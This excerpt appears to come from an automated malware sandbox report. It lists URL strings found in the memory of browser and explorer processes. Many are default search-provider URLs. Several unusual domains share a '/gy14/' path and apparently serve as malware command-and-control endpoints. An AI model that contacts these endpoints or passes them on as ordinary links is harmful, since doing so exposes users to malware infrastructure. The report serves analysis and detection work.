          Source: iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.gamer.com.tw/
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.gamer.com.tw/?A~
          Source: iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.gismeteo.ru/
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D2000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.goo.ne.jp/
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico)x
          Source: iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.hanafos.com/
          Source: iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
          Source: iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.interpark.com/
          Source: iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.ipop.co.kr/
          Source: iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.icosI
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.live.com/results.aspx
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4173797884.000001BA5D690000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175701016.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&q=
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6B6000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175701016.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&q=
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6B6000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175701016.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&q=
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
          Source: iexplore.exe, 0000000D.00000002.4167076882.000001BA5D2B0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=%7BsearchTerms%7D&FORM=AS5qd
          Source: iexplore.exe, 0000000D.00000002.4167076882.000001BA5D2B0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=%7BsearchTerms%7D&FORM=AS6He
          Source: iexplore.exe, 0000000D.00000002.4167076882.000001BA5D2B0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=%7BsearchTerms%7D&FORM=CBPW9d
          Source: iexplore.exe, 0000000D.00000002.4167076882.000001BA5D273000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=%7BsearchTerms%7D&FORM=IE7BOX&src=%7Breferrer:source?%7Dz-
          Source: iexplore.exe, 0000000D.00000002.4167076882.000001BA5D273000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=%7BsearchTerms%7D&FORM=IE7RE&src=%7Breferrer:source?%7D
          Source: iexplore.exe, 0000000D.00000002.4167076882.000001BA5D273000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=%7BsearchTerms%7D&FORM=MSNIE7&src=%7Breferrer:source?%7D?
          Source: iexplore.exe, 0000000D.00000002.4167076882.000001BA5D273000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=%7BsearchTerms%7D&Form=IE8SRC&src=%7Breferrer:source%7D~
          Source: iexplore.exe, 0000000D.00000002.4159269749.000001BA5A8B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=%7BsearchTerms%7D&mkt=%7BLanguage%7D&FORM=IE8SRC&src=%7Breferr
          Source: iexplore.exe, 0000000D.00000002.4167076882.000001BA5D273000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=%7BsearchTerms%7D&src=%7Breferrer:source?%7D&Form=IE8SRC
          Source: iexplore.exe, 0000000D.00000002.4167076882.000001BA5D273000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=%7BsearchTerms%7D&src=%7Breferrer:source?%7DI
          Source: iexplore.exe, 0000000D.00000002.4159269749.000001BA5A893000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=%7BsearchTerms%7D&src=IE-SearchBox&Form=IE8SRCY
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.livedoor.com/
          Source: iexplore.exe, 0000000D.00000002.4175410383.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
          Source: iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.247fracing.com
          Source: iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.247fracing.com/gy14/
          Source: iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.247fracing.comReferer:
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.6733633.com
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.6733633.com/gy14/
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.6733633.com/gy14/www.camelpmkrf.com
          Source: iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.6733633.com/gy14/www.mtdiyx.xyz
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.6733633.comReferer:
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.883831.com
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.883831.com/gy14/
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.883831.com/gy14/www.mosaica.online
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.883831.com/gy14/www.smnyg.com
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.883831.comReferer:
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175701016.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4173797884.000001BA5D6A0000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086409742.000001BA5D69F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.abril.com.br/
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D2000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.abril.com.br/Dr
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175701016.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4173797884.000001BA5D6A0000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086409742.000001BA5D69F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.abril.com.br/favicon.icoNx
          Source: iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.accepted6.com
          Source: iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.accepted6.com/gy14/
          Source: iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.accepted6.com/gy14/www.0854n5.shop
          Source: iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.accepted6.comReferer:
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.aicashu.com
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.aicashu.com/gy14/
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.aicashu.com/gy14/www.qieqyt.xyz
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.aicashu.comReferer:
          Source: iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.alarabiya.net/
          Source: iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
          Source: iexplore.exe, 0000000D.00000002.4175410383.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.icoe
          Source: iexplore.exe, 0000000D.00000002.4173797884.000001BA5D6A0000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086409742.000001BA5D69F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.amazon.co.jp/
          Source: iexplore.exe, 0000000D.00000002.4173797884.000001BA5D6A0000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086409742.000001BA5D69F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.amazon.co.uk/
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D39C000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4187597827.000001BA61100000.00000004.00000800.00020000.00000000.sdmp, msapplication.xml.13.drString found in binary or memory: http://www.amazon.com/
          Source: iexplore.exe, 0000000D.00000002.4173797884.000001BA5D6A0000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086409742.000001BA5D69F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&keyword=
          Source: iexplore.exe, 0000000D.00000002.4173797884.000001BA5D6A0000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086409742.000001BA5D69F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
          Source: iexplore.exe, 0000000D.00000002.4173797884.000001BA5D6A0000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086409742.000001BA5D69F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico7
          Source: iexplore.exe, 0000000D.00000002.4173797884.000001BA5D6A0000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086409742.000001BA5D69F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&tag=ie8search-20&index=blended&linkCode=qs&camp=1789&creativ
          Source: iexplore.exe, 0000000D.00000002.4173797884.000001BA5D6A0000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086409742.000001BA5D69F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.amazon.de/
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.amiciperlacoda.com
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.amiciperlacoda.com/gy14/
          Source: iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.amiciperlacoda.com/gy14/www.artbydianayorktownva.com
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.amiciperlacoda.com/gy14/www.beautyloungebydede.online
